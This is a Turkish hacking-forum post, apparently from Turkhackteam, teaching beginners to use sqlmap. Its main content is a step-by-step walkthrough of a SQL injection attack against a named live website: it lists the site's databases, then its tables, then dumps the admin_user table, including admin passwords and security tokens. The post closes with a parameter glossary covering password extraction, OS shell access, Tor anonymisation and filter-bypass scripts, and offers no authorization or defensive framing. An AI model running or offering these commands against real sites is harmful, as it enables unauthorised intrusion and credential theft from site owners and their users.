LİNUX KULÜBÜ SQLMAP Kullanımı

xelarmenbyhacked

Uzman üye
5 Ocak 2013
1,558
0
Merhabalar ben Xelarmen. Önceki açtığım konuda (Diğer Konu)JSQL Aracını tanıtmıştık. Bugünki aracımızın ismi SQLMAP. Kali linux kullananların çok iyi bileceği bir araçtır. Birçok veritabanına uygun çalışma şekilleri ve Bypass yöntemleri vardır. A

Sizi çok sıkmadan programa geçiyorum...>>

Program bir GUİ (Grafiksel Kullanıcı Arayüzü)'ye sahip değil. Ucbirim diğer bir adıyla terminal üzerinden adını yazarak çalıştırıyoruz..
Resimdeki gibi:
Ay4zJL.png

Şekilde gördüğünüz gibi programın adını yazdığımız an bizi sqlmap'in ascii art ile yazılmış logosu karşılıyor ve bu bizim bilgisayarımızda SQLMAP programının yüklü olduğunu gösteriyor.

Eğer ki bilgisayarınızda SQLMAP yüklü değilse.....>>

UYGULAMANIN LİNKİ

Yukarıdaki siteden uygulamayı indirin ve zipten çıkartın. Tavsiyem her zamanki gibi çalışma ortamınız yani uygulamanın bulunduğu dizinin temiz olmasından yana. Zipten çıkardıktan sonra programın bulunduğu dizinde şu komutu verin
Kod:
python programadı.py
Programadı yazan yere indirdiğiniz dosyanın adını yazıyorsunuz.

Programın Komutları.....>>

Programın komutlarını diğer bir deyişle parametrelerini
Kod:
sqlmap -h
Kod:
sqlmap --help
Komutlarını kullanarak öğrenebilirsiniz. Ben konunun sonuna birçok parametrenin Türkçe karşılığını ekleyeceğim
4G7z9J.png


Sıra geldi öğrenmemiz gereken birkaç ayrıntıya..>>

Biz ilk etapta veritabanlarını(database) leri sıralatacağız. Ardıntan tabloları(tables) en son olarak ise sütunları(columns) ları çekeceğiz. Bu sıralama bizim çok işimize yarayacak.



Sql açıklı bir site üzerinde tarama nasıl yapacağım?..>>
Programın taslağı alttaki komuttur arkadaşlar:
Kod:
sqlmap -u"www.aciklisite.com/
Kod:
[COLOR=White][SIZE=3][FONT=Franklin Gothic Medium]allinurl:news.php?id=" --dbs [/FONT][/SIZE][/COLOR]

Bu komutu verdiğimiz andan itibaren programımız hedef sitedeki veritabanlarını araştıracaktır.
Şekildeki gibi:
ByJz5v.png

Siteyi bir önceki konudaki siteyle aynısı olarak seçmemin sebebi görsel arayüz ile ucbirim arasındaki benzerlikleri görmenizdir.
İki adet veritabanı bulundu. Sıra bu veritabanlarının içindeki tabloları çekme zamanı
Komutumuz:
Kod:
[COLOR=White][SIZE=3][FONT=Franklin Gothic Medium]sqlmap -u "http://www.tunesoman.com/product.php?id=200" -D db363851433 --tables
[/FONT][/SIZE][/COLOR]


Tablolarımız şekildeki gibi karşımıza geliyor:
kX46mD.png


Evet tablolar karşımıza geldi ve sütunları çekeceğiz şimdide.
Hedefimiz admin_user sütunu
Kod:
sqlmap -u "http://www.tunesoman.com/product.php?id=200" -D db363851433 -T admin_user --columns
Yukardaki kodu yazdıktan sonra aşağıdaki gibi sütunlar karşımıza gelecektir:
nJzlXM.png


Evet sırada ise işin en güzel tarafına geldik. Verileri çekme zamanı. Aşağıdaki komut ile bütün verileri çekeceğim. Siz -C den sonra gelen içerikleri değiştirebilirsiniz.
Kod:
sqlmap -u "http://www.tunesoman.com/product.php?id=200" -D db363851433 -T admin_user -C admin_email,admin_first_name,admin_last_name,admin_level,admin_pass,admin_status,admin_user_name,created,id,last_login,login_attempt_failed,modified,module_access,security_token --dump
Yukarıdaki kod gözünüzü korkutmasın. Sadece istediğimiz sütun isimlerini yazdık ve aralarına birer virgül ve en son olarak --dump koyduk. Şimdi ise gelsin bakalım veriler :RpS_tongue:.
ZOvXdA.png


Excel tablosu halinde otomatik olarak home dizininin içindeki .sqlmap klasörünün içerisine kaydediyor. Eğer ki klasöre göremiyorsanız ctrl+h kısayolunu kullanarak gizli klösörleri görünür hale getirebilirsiniz.

PROGRAMIN PARAMETRELERİ..>>


-h, --help// Yardım Menüsünü açar
-hh// Gelişmiş Yardım Menüsünü Açar
--version// Versiyon öğrenme
-v VERBOSE// Gösterim şekli level:06 (varsayılan 1)
-u URL, --url=URL// Hedef URL
-g GOOGLEDORK// Google dork araması yapar ve URL listesini listeler
--data=DATA// Post işlerinde data belirtmek için kullanılır
--cookie=COOKİE// Cookie belirtmek için kullanılır
--random-agent// Rastgele HTTP User-Agent başlık bilgisi kullanmak için kullanılır
--proxy=PROXY// Rastgele proxy kullanmak için kullanılır
--tor// Tor Network ile tarama sağlar
--check-tor// Tor doğruluk testi için kullanılır
--level=LEVEL// Test seviyesi belirtme (1-5, varsayılan 1)
--risk=RISK// Risk seviyesi belirtme (1-5, varsayılan 1)
--technique=TECH// SQL Injection teknikleri belirtme (varsayılan “BEUSTQ”)
-a, --all// Veri çekmek için kullanılır
-b, --banner// Database banner gösterir
--current-user// Database içindeki kullanıcılları listeler
--current-db// Genel databaseyi gösterir
--passwords// Databasedeki şifreleri çeker
--tables// Databasedeki tabloları listeler
--columns// Database içerisindeki tabloların kolonlarını listeler
--schema// Databaseleri listeler
--dump// Databasedeki tablo girdilerini çeker
--dump-all// Databasedeki bütün tablo girdilerini çeker
-D DB// Database belirtmek için kullanılır
-T TBL// Tablo belirtmek için kullanılır
-C COL// Kolon belirtmek için kullanılır
--os-shell// Shell oturumu başlatır
--tamper// Bypass script kullanmak için kullanılır



Bundan sonrası sizin hayalgücünüze bağlı arkadaşlar.
Videolu anlatım en yakın zamanda konuya eklenecektir. Ayrıca programın bütün özellikleri konuda anlattığımla kısıtlı değil. Daha birçok özelliği var. Bu anlattıklarım sadece başlangıç seviyede.
İyi forumlar diliyorum....



 
Son düzenleme:

Noyan THT

Katılımcı Üye
24 Haz 2016
315
0
Eline sağlık ta forumda bununla aynı içeriğe özgü birçok anlatım var.Keşke advanced seviyede kullanımını anlatsaydın.
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.